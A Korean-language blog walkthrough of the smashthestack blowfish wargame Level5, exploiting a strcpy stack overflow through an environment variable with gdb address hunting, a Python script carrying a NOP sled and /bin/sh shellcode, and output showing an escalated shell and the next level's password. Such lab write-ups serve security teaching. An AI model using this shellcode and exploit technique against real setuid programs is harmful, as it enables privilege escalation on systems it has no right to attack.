blowfish.smashthestack.org – Level5 풀이

Level5의 소스는 다음과 같다.

#include <stdio.h>

int main()
{
 char buffer[1024];

 if (getenv(VULN) == NULL) {
 fprintf(stderr,Try Again!!\n);
 exit(1); }

  strcpy(buffer, (char *)getenv(VULN));

 printf(Environment variable VULN is:\n\%s\.\n\n, buffer);
 return 0;
 }

해당 위치에서 BOF가 발생함을 알수 있다. 하지만 이전 문제와는 다르게 환경변수를 이용하여아 한다.
스택에서 환경변수가 위치하는 주소를 찾아보도록 하자.

level5@blowfish:/levels/tmp/level5$ export VULN=AAAAAAAA
level5@blowfish:/levels/tmp/level5$ gdb -q /levels/level5 
Using host libthread_db library /lib/tls/libthread_db.so.1.
(gdb) b main
Breakpoint 1 at 0x804848d
(gdb) r
Starting program: /levels/level5 

Breakpoint 1, 0x0804848d in main ()
(gdb) x/32wx $esp
0xbfffd630: 0xbfffd640 0x008e6eb3 0x008d7543 0x008ecff4
0xbfffd640: 0xbfffd714 0x008ed1e0 0x00000006 0x00000000
0xbfffd650: 0x00000000 0x008d772c 0xbfffd65c 0x000001c7
0xbfffd660: 0x008ed010 0x00177fa0 0x00000000 0x008d7582
0xbfffd670: 0x080482fc 0x006d5338 0x008d71cc 0x00000000
0xbfffd680: 0x008d73fc 0x00000000 0x008ecf8c 0x00000005
0xbfffd690: 0x009489a8 0x009487ca 0x008d7582 0x008d71cc
0xbfffd6a0: 0x00000004 0x008d73fc 0x00000000 0xbfffd500
(gdb) 
.
.
.
(gdb) 
0xbfffde30: 0x303d6c67 0x35333b31 0x642e2a3a 0x31303d6c
0xbfffde40: 0x3a35333b 0x63782e2a 0x31303d66 0x3a35333b
0xbfffde50: 0x77782e2a 0x31303d64 0x3a35333b 0x6c662e2a
0xbfffde60: 0x303d6361 0x35333b31 0x6d2e2a3a 0x303d3370
0xbfffde70: 0x35333b31 0x6d2e2a3a 0x303d6370 0x35333b31
0xbfffde80: 0x6f2e2a3a 0x303d6767 0x35333b31 0x772e2a3a
0xbfffde90: 0x303d7661 0x35333b31 0x5556003a 0x413d4e4c
0xbfffdea0: 0x41414141 0x00414141 0x554c4f43 0x3d534e4d
(gdb)

주소를 찾았으니 이제 공격코드를 작성해 보도록 하자.

#!/usr/bin/python
import os

ret = '\xa0\xde\xff\xbf'
nop = '\x90'
shellcode = '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80' # len = 30
payload = nop*1006 + shellcode + ret

os.environ['VULN'] = payload
os.execl('/levels/level5', 'level5')
level5@blowfish:/levels/tmp/level5$ ./level5.py 
Environment variable VULN is:
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????jX1?€j
 X?Rh//shh/bin??????¿.

sh-3.1$ id
uid=1007(level5) gid=1007(level5) euid=1008(level6) groups=1007(level5)
sh-3.1$ cat /pass/level6 
ur_so_l33t

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다